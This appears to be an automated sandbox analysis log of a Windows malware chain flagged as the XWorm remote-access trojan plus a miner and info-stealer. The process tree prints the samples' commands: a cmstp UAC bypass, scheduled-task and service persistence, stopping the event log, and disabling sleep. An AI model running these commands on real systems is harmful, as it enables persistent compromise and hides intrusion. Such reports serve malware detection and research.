                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe, type: DROPPEDMatched rule: rat_win_xworm_v2 author = Sekoia.io, description = Finds XWorm v2 samples based on characteristic strings, creation_date = 2022-11-07, classification = TLP:CLEAR, version = 1.0, reference = https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/, id = 6cf06f52-0337-415d-8f29-f63d67e228f8
                          Source: Ele.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: random[1].exe.5.drStatic PE information: Section: irrkukjx ZLIB complexity 0.9901571072769275
                          Source: 718e743381.exe.5.drStatic PE information: Section: irrkukjx ZLIB complexity 0.9901571072769275
                          Source: random[2].exe.5.drStatic PE information: Section: hasiulpx ZLIB complexity 0.9946923616136035
                          Source: 739ad26354.exe.5.drStatic PE information: Section: hasiulpx ZLIB complexity 0.9946923616136035
                          Source: random[1].exe1.5.drStatic PE information: Section: ZLIB complexity 0.997758205581761
                          Source: random[1].exe1.5.drStatic PE information: Section: ulxuyjiv ZLIB complexity 0.9940901949802552
                          Source: e44fda3216.exe.5.drStatic PE information: Section: ZLIB complexity 0.997758205581761
                          Source: e44fda3216.exe.5.drStatic PE information: Section: ulxuyjiv ZLIB complexity 0.9940901949802552
                          Source: skotes.exe.0.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                          Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                          Source: NzL6O1Q[1].exe.5.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
                          Source: NzL6O1Q.exe.5.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
                          Source: NzL6O1Q.exe.20.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
                          Source: NzL6O1Q.exe0.20.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
                          Source: NzL6O1Q.exe.5.dr, Helper.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: NzL6O1Q.exe.5.dr, Helper.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: NzL6O1Q.exe.20.dr, Helper.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: NzL6O1Q.exe.20.dr, Helper.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: NzL6O1Q.exe0.20.dr, Helper.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: NzL6O1Q.exe0.20.dr, Helper.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: NzL6O1Q[1].exe.5.dr, Helper.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: NzL6O1Q[1].exe.5.dr, Helper.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine, Classification label: mal100.troj.adwa.spyw.expl.evad.mine.winEXE@83/1075@0/13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\9LbUK15[1].exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe, Mutant created: \Sessions\1\BaseNamedObjects\456
Source: C:\Windows\System32\conhost.exe, Mutant created: \BaseNamedObjects\Local\SM0:6220:120:WilError_03
Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exe, Mutant created: NULL
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_03
Source: C:\Windows\System32\svchost.exe, Mutant created: \BaseNamedObjects\Global\vohvtbtkkqqpcgvy
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2472:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5124:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \BaseNamedObjects\Local\SM0:5476:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5916:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \BaseNamedObjects\Local\SM0:3992:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2196:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \BaseNamedObjects\Local\SM0:6184:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:396:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3604:120:WilError_03
Source: C:\Windows\SysWOW64\cmstp.exe, Mutant created: \Sessions\1\BaseNamedObjects\Connection Manager Profile Installer Mutex
Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, Mutant created: \Sessions\1\BaseNamedObjects\zqSMCisGkvTtWK5F
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
Source: C:\Users\user\Desktop\file.exe, File created: C:\Users\user\AppData\Local\Temp\abc3bc1985
Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\svchost.exe, WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\svchost.exe, WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Users\user\Desktop\file.exe, File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp, Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: e44fda3216.exe, 0000000B.00000003.2388649203.0000000005345000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2388271867.0000000005379000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, ReversingLabs: Detection: 57%
Source: file.exe, String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe, String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: e44fda3216.exe, String found in binary or memory: "app.update.lastUpdateTime.recipe-client-addon-run", 1696333830); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856); user_pref("app.update.lastUpdateTime.xpi-signatur
Source: e44fda3216.exe, String found in binary or memory: p.update.lastUpdateTime.recipe-client-addon-run", 1696333830); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856); user_pref("app.update.lastUpdateTime.xpi-signature-v
Source: C:\Users\user\Desktop\file.exe, File read: C:\Users\user\Desktop\file.exe
Source: unknown, Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe, Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown, Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, Process created: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe "C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe"
Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe, Process created: C:\Windows\SysWOW64\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Users\user\Sys.inf
Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe, Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe"
Source: unknown, Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, Process created: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe "C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, Process created: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe "C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe"
Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe, Process created: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp "C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp" /SL5="$30528,1318164,161792,C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe"
Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp, Process created: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe "C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe, Process created: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp "C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp" /SL5="$20532,1318164,161792,C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp, Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv"
Source: C:\Windows\SysWOW64\regsvr32.exe, Process created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv"
Source: C:\Windows\System32\regsvr32.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, Process created: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe "C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe"
Source: unknown, Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe"
Source: unknown, Process created: C:\Users\user\AppData\Local\Temp\pcqxl.exe C:\Users\user\AppData\Local\Temp\pcqxl.exe
Source: C:\Users\user\AppData\Local\Temp\pcqxl.exe, Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "NzL6O1Q" /tr "C:\Users\user\AppData\Roaming\NzL6O1Q.exe"
Source: C:\Windows\System32\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\pcqxl.exe, Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\pcqxl.exe, Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown, Process created: C:\Users\user\AppData\Roaming\NzL6O1Q.exe C:\Users\user\AppData\Roaming\NzL6O1Q.exe
Source: C:\Users\user\AppData\Local\Temp\pcqxl.exe, Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\pcqxl.exe, Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "RNRFMTFS"
Source: C:\Windows\System32\sc.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\pcqxl.exe, Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "RNRFMTFS" binpath= "C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe" start= "auto"
Source: C:\Windows\System32\sc.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\pcqxl.exe, Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\pcqxl.exe, Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "RNRFMTFS"
Source: C:\Windows\System32\sc.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown, Process created: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe
Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe, Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe, Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe, Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe, Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\Windows\System32\powercfg.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe, Process created: C:\Windows\System32\svchost.exe svchost.exe
Source: unknown, Process created: C:\Users\user\AppData\Roaming\NzL6O1Q.exe "C:\Users\user\AppData\Roaming\NzL6O1Q.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, Process created: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe "C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe"
Source: unknown, Process created: C:\Users\user\AppData\Roaming\NzL6O1Q.exe "C:\Users\user\AppData\Roaming\NzL6O1Q.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, Process created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: cmutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: cmcfg32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: cmlua.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: comsvcs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: cmstplua.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: cmlua.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: thumbcache.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeSection loaded: apphelp.dll
